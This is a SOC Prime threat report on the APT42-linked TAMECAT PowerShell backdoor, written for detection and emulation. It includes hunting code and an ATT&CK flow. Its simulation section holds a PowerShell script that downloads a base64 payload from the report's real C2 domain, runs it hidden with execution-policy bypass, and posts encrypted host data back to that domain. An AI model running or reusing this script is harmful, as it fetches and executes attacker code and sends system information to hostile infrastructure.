SOC Prime Bias: Critical

30 Jan 2026 20:30

TAMECAT – Analysis of an Iranian PowerShell-Based Backdoor

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

TAMECAT is a PowerShell-based backdoor attributed to the Iran-linked, state-sponsored group APT42 and used for espionage. Delivery begins with a VBScript dropper that conditionally chooses PowerShell or cmd.exe based on detected endpoint security products, then pulls additional components from attacker-controlled hosting domains. The implant uses a Telegram bot for C2 coordination and exfiltrates collected data over HTTPS with custom AES encryption. The campaign primarily targets senior defense and government officials.

Investigation

Researchers examined the initial VBScript dropper, the PowerShell loader (referenced as nconf.txt), and encrypted payload stages. Analysis surfaced heavy command obfuscation, bespoke AES routines, and exfiltration to a glitch.me-hosted domain. The team extracted indicators including malicious URLs, user-agent strings, and filesystem artifacts, and noted TAMECAT’s modular design—allowing it to fetch and execute additional stages on demand.

Mitigation

Use EDR/AV controls that block or constrain script execution, and monitor for wscript.exe spawning powershell.exe or cmd.exe. Enable PowerShell script-block logging and enforce strict execution policies for unsigned scripts. Improve resilience against the initial access vector by training users to recognize phishing and social-engineering tactics.
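A hunt over process-creation telemetry for the patterns the Mitigation section names (a VBScript host spawning powershell.exe or cmd.exe, hidden PowerShell with the execution policy bypassed, and a command line referencing the report's C2 domain), as an added example that is not SOC Prime's detection content. The events are constructed Sysmon Event ID 1 style records with invented paths; only the field names (ParentImage, Image, CommandLine) follow Sysmon.

```python
import re

# Constructed Sysmon Event ID 1 style records (invented for this example, not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File C:\Users\u\AppData\Local\Temp\tamecat.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -Command Get-Date"},
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c powershell -w hidden -ep bypass"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -nop -c "iwr https://accurate-sprout-porpoise.glitch.me/s3.tebi.io/icestorage/config/nconf.txt"'},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}        # VBScript interpreters
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}   # children called out in the Mitigation section
# Tolerates the abbreviated parameter forms PowerShell accepts (-ep / -exec, -w / -win).
BYPASS_RE = re.compile(r"-(?:ep|exec\w*)\s+bypass", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:in\w*)?\s+hidden", re.IGNORECASE)
C2_DOMAIN = "accurate-sprout-porpoise.glitch.me"     # C2 domain named in this report

def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def evaluate(event):
    """Return the detection tags that fire for one process-creation event."""
    tags = []
    if basename(event["ParentImage"]) in SCRIPT_HOSTS and basename(event["Image"]) in SHELLS:
        tags.append("vbscript_spawns_shell")
    cmd = event.get("CommandLine", "")
    if BYPASS_RE.search(cmd) and HIDDEN_RE.search(cmd):
        tags.append("hidden_bypass_powershell")
    if C2_DOMAIN in cmd.lower():
        tags.append("tamecat_c2_domain")
    return tags

def hunt(events):
    """Return (index, tags) for every event that fires at least one tag."""
    hits = []
    for i, event in enumerate(events):
        tags = evaluate(event)
        if tags:
            hits.append((i, tags))
    return hits
```

The benign explorer.exe-launched PowerShell in the sample set fires nothing, which is the false-positive check a rule like this needs before it goes live.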

Response

When TAMECAT indicators are observed, isolate the endpoint, stop malicious PowerShell activity, and collect key artifacts such as config.txt, the loader/config files, and network telemetry. Block associated domains and URLs at proxy/firewall layers, then perform environment-wide hunting for similar PowerShell/VBScript tradecraft and related IOCs.

Attack Flow

    graph TB
    %% Class definitions
    classDef initial fill:#a6cee3
    classDef execution fill:#99ccff
    classDef defense fill:#fdae6b
    classDef discovery fill:#b2df8a
    classDef collection fill:#fb9a99
    classDef exfil fill:#cab2d6
    classDef c2 fill:#e5d8bd
    classDef lateral fill:#ffff99
    %% Nodes
    initial_access["<b>Initial Access</b> – <b>T1204.002 User Execution: Malicious File</b><br/>Victim opens a VBScript attachment that launches the infection chain"]
    class initial_access initial
    exec_vbs["<b>Execution</b> – <b>T1059.005 Visual Basic</b><br/>VBScript interpreter runs the malicious script"]
    class exec_vbs execution
    exec_wmi["<b>Execution</b> – <b>T1047 Windows Management Instrumentation</b><br/>Script uses WMI to enumerate installed antivirus products"]
    class exec_wmi execution
    exec_ps["<b>Execution</b> – <b>T1059.001 PowerShell</b><br/>Based on AV check, launches PowerShell via conhost or cmd to download the loader"]
    class exec_ps execution
    evasion_obf["<b>Defense Evasion</b> – <b>T1027.013 Encrypted/Encoded</b> & <b>T1027.008 Stripped Payloads</b><br/>Loader employs base64, bitwise NOT, and AES encryption"]
    class evasion_obf defense
    evasion_reflect["<b>Defense Evasion</b> – <b>T1620 Reflective Code Loading</b><br/>Decoded code is loaded and executed directly in memory"]
    class evasion_reflect defense
    evasion_deob["<b>Defense Evasion</b> – <b>T1140 Deobfuscate/Decode Files or Information</b><br/>Script decodes embedded data before further execution"]
    class evasion_deob defense
    discover_sys["<b>Discovery</b> – <b>T1082 System Information Discovery</b> & <b>T1518.001 Software Discovery</b><br/>Collects OS version, computer name, installed software, and AV list"]
    class discover_sys discovery
    discover_browser["<b>Discovery</b> – <b>T1217 Browser Information Discovery</b><br/>Remote-debugging of Edge/Chrome to harvest browser data"]
    class discover_browser discovery
    collect_screen["<b>Collection</b> – <b>T1113 Screen Capture</b> & <b>T1125 Video Capture</b><br/>Captures screenshots and video of the victim UI"]
    class collect_screen collection
    collect_input["<b>Collection</b> – <b>T1056 Input Capture</b><br/>Captures keystrokes and other user input"]
    class collect_input collection
    exfil_c2["<b>Exfiltration</b> – <b>T1041 Exfiltration Over C2 Channel</b><br/>Data sent over HTTPS to https://accurate-sprout-porpoise.glitch.me"]
    class exfil_c2 exfil
    exfil_enc["<b>Exfiltration</b> – <b>T1573.001 Encrypted Channel: Symmetric Cryptography</b><br/>Data encrypted with AES-256 before transmission"]
    class exfil_enc exfil
    exfil_encod["<b>Exfiltration</b> – <b>T1132.001 Standard Encoding</b><br/>AES ciphertext is base64-encoded"]
    class exfil_encod exfil
    c2_web["<b>Command and Control</b> – <b>T1071.001 Web Protocols</b><br/>C2 communications over HTTPS"]
    class c2_web c2
    c2_telegram["<b>Command and Control</b> – <b>T1102.002 Bidirectional Communication</b><br/>Telegram bot used for command and response"]
    class c2_telegram c2
    lateral_move["<b>Lateral Movement</b> – <b>T1210 Exploitation of Remote Services</b><br/>Possible later stage to move across the network"]
    class lateral_move lateral
    %% Connections
    initial_access -->|leads_to| exec_vbs
    exec_vbs -->|uses| exec_wmi
    exec_wmi -->|triggers| exec_ps
    exec_ps -->|downloads| evasion_obf
    evasion_obf -->|decoded_by| evasion_deob
    evasion_deob -->|loads_via| evasion_reflect
    evasion_reflect -->|enables| discover_sys
    evasion_reflect -->|enables| discover_browser
    discover_sys -->|feeds| collect_screen
    discover_browser -->|feeds| collect_screen
    collect_screen -->|provides_data_to| collect_input
    collect_input -->|sends_to| exfil_c2
    exfil_c2 -->|encrypted_by| exfil_enc
    exfil_enc -->|encoded_by| exfil_encod
    exfil_encod -->|transmitted_via| c2_web
    c2_web -->|communicates_with| c2_telegram
    c2_telegram -->|may_initiate| lateral_move

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:

    1. Recon & C2 Discovery: The attacker runs a PowerShell one‑liner that resolves the malicious domain accurate-sprout-porpoise.glitch.me and initiates a TLS connection to fetch a small configuration file (nconf.txt).
    2. Payload Retrieval: Using Invoke-WebRequest with a custom user‑agent, the attacker downloads the base64‑encoded backdoor script (df32s.txt).
    3. Deobfuscation & Execution: The base64 payload is decoded, saved to %TEMP%\tamecat.ps1, and executed via powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden.
    4. Lateral Movement: The backdoor employs WMI (winrm) to spawn a remote process on a neighboring host, demonstrating T1047.
    5. Data Staging & Exfiltration: System information (hostname, OS version) is collected, AES‑encrypted, and posted back to s3.tebi.io/icestorage/df32s.txt.
  • Regression Test Script:

    # ------------------------------------------------------------
    # TAMECAT C2 Communication & Data Exfiltration Simulation
    # ------------------------------------------------------------

    # 1. Resolve malicious domain (C2)
    $c2Domain = "accurate-sprout-porpoise.glitch.me"
    $c2Ip = [System.Net.Dns]::GetHostAddresses($c2Domain)[0].IPAddressToString
    Write-Host "[*] Resolved C2 domain to $c2Ip"

    # 2. Fetch configuration (simulated)
    $configUrl = "https://$c2Domain/s3.tebi.io/icestorage/config/nconf.txt"
    try {
        $config = Invoke-WebRequest -Uri $configUrl -UseBasicParsing -Headers @{ "User-Agent" = "Mozilla/5.0" }
        Write-Host "[*] Config downloaded ($($config.Content.Length) bytes)"
    } catch {
        Write-Error "Failed to fetch config: $_"
        exit 1
    }

    # 3. Retrieve the base64-encoded payload
    $payloadUrl = "https://$c2Domain/s3.tebi.io/icestorage/df32s.txt"
    $b64Payload = Invoke-WebRequest -Uri $payloadUrl -UseBasicParsing -Headers @{ "User-Agent" = "Mozilla/5.0" }
    $payloadBytes = [Convert]::FromBase64String($b64Payload.Content)

    # 4. Save & execute payload (Join-Path avoids the missing-separator bug of "$env:TEMPtamecat.ps1")
    $payloadPath = Join-Path $env:TEMP "tamecat.ps1"
    [IO.File]::WriteAllBytes($payloadPath, $payloadBytes)
    Write-Host "[*] Payload written to $payloadPath"

    # Execute hidden
    Start-Process -FilePath "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File `"$payloadPath`"" -WindowStyle Hidden

    # 5. Simulate data collection & exfiltration
    $sysInfo = @{
        Hostname = $env:COMPUTERNAME
        OS       = (Get-CimInstance Win32_OperatingSystem).Caption
    } | ConvertTo-Json

    # Encrypt with a random per-run AES-256 key (demo only: the key is never shared, so the
    # posted blob only exercises the network telemetry; the real implant uses its own AES routine)
    [byte[]]$aesKey = (1..32 | ForEach-Object { Get-Random -Maximum 256 })
    $aes = New-Object System.Security.Cryptography.AesManaged
    $aes.Key = $aesKey
    $aes.Mode = 'CBC'
    $aes.GenerateIV()
    $encryptor = $aes.CreateEncryptor()
    $plainBytes = [System.Text.Encoding]::UTF8.GetBytes($sysInfo)
    $cipherBytes = $encryptor.TransformFinalBlock($plainBytes, 0, $plainBytes.Length)
    # IV is prepended to the ciphertext before base64 encoding
    $exfilData = [Convert]::ToBase64String([byte[]]($aes.IV + $cipherBytes))

    # POST exfiltrated data back to C2
    $exfilUrl = "https://$c2Domain/s3.tebi.io/icestorage/df32s.txt"
    Invoke-WebRequest -Uri $exfilUrl -Method POST -Body $exfilData -ContentType "application/octet-stream"

    Write-Host "[*] Simulation complete. Data exfiltrated to $exfilUrl"
  • Cleanup Commands:

    # Remove the temporary payload
    Remove-Item -Path (Join-Path $env:TEMP "tamecat.ps1") -ErrorAction SilentlyContinue

    # Flush DNS cache (helps avoid residual entries)
    ipconfig /flushdns

    # Stop any lingering hidden PowerShell process started by the payload (if still running).
    # Get-Process only exposes the executable path, so match on the command line via CIM instead.
    Get-CimInstance Win32_Process -Filter "Name = 'powershell.exe'" |
        Where-Object { $_.CommandLine -like "*tamecat.ps1*" } |
        ForEach-Object { Stop-Process -Id $_.ProcessId -Force -ErrorAction SilentlyContinue }

    Write-Host "[*] Cleanup finished."